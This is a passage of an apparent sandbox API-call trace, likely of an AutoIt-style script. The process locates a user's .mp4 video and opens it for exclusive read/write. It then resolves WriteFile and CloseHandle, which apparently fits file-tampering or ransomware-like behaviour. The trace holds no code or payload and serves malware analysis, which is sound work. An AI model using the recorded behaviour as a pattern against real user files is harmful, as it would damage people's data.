wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0192.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0192.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0192.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0192.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0192.321] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc71b0f80, ftCreationTime.dwHighDateTime=0x1d5e0cb, ftLastAccessTime.dwLowDateTime=0xf8e453b0, ftLastAccessTime.dwHighDateTime=0x1d5d972, ftLastWriteTime.dwLowDateTime=0xf8e453b0, ftLastWriteTime.dwHighDateTime=0x1d5d972, nFileSizeHigh=0x0, nFileSizeLow=0xc1eb, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="IipHJEO8.mp4", cAlternateFileName="")) returned 0x90ae18 [0192.321] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0192.322] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0192.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0192.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0192.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0192.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0192.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0192.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0192.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0192.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0192.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0192.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0192.322] CharLowerBuffW (in: lpsz="byte[49643]", cchLength=0xb | out: lpsz="byte[49643]") returned 0xb [0192.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0192.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0192.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0192.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0192.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0192.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0192.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0192.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0192.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0192.322] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0192.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0192.323] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0192.323] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0192.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0192.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0192.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0192.323] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0192.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0192.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.323] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0192.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0192.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0192.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0192.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x8e19f0 [0192.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x8e19f0, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0192.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0192.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0192.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0192.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0192.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0192.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0192.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0192.324] FreeLibrary (hLibModule=0x75c90000) returned 1 [0192.324] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0192.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0192.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0192.324] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0192.324] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0192.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0192.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0192.324] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0192.324] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0192.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0192.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0192.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0192.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0192.324] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0192.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0192.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0192.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0192.325] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0192.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0192.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0192.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0192.325] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0192.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0192.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0192.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0192.347] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0192.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0192.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0192.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0192.347] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0192.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0192.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0192.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0192.347] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0192.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0192.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0192.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0192.347] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0192.348] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0192.348] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.348] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.348] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0192.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0192.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0192.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0192.348] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0192.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0192.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0192.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0192.348] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0192.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0192.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0192.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0192.348] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0192.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0192.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0192.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0192.348] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0192.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0192.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0192.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0192.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0192.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0192.349] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0192.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0192.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0192.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0192.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0192.349] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0192.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0192.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0192.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1b0 [0192.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9ba1b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0192.349] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0ntyy6p\\iiphjeo8.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0192.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0192.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0192.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0192.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0192.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0192.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0192.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0192.350] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.350] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0192.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0192.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0192.350] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0192.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0192.350] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0192.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0192.350] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0192.350] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0192.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0192.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0192.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0192.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0192.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0192.350] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0192.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0192.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0192.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0192.351] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0192.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0192.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0192.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9ba1c8 [0192.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9ba1c8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0192.352] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.352] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0192.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0192.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0192.352] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0192.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0192.352] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0192.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0192.352] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0192.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0192.352] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0192.352] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0192.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0192.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0192.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0192.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0192.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0192.353] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0192.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0192.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0192.353] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0192.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0192.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0192.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd960 [0192.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd960, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 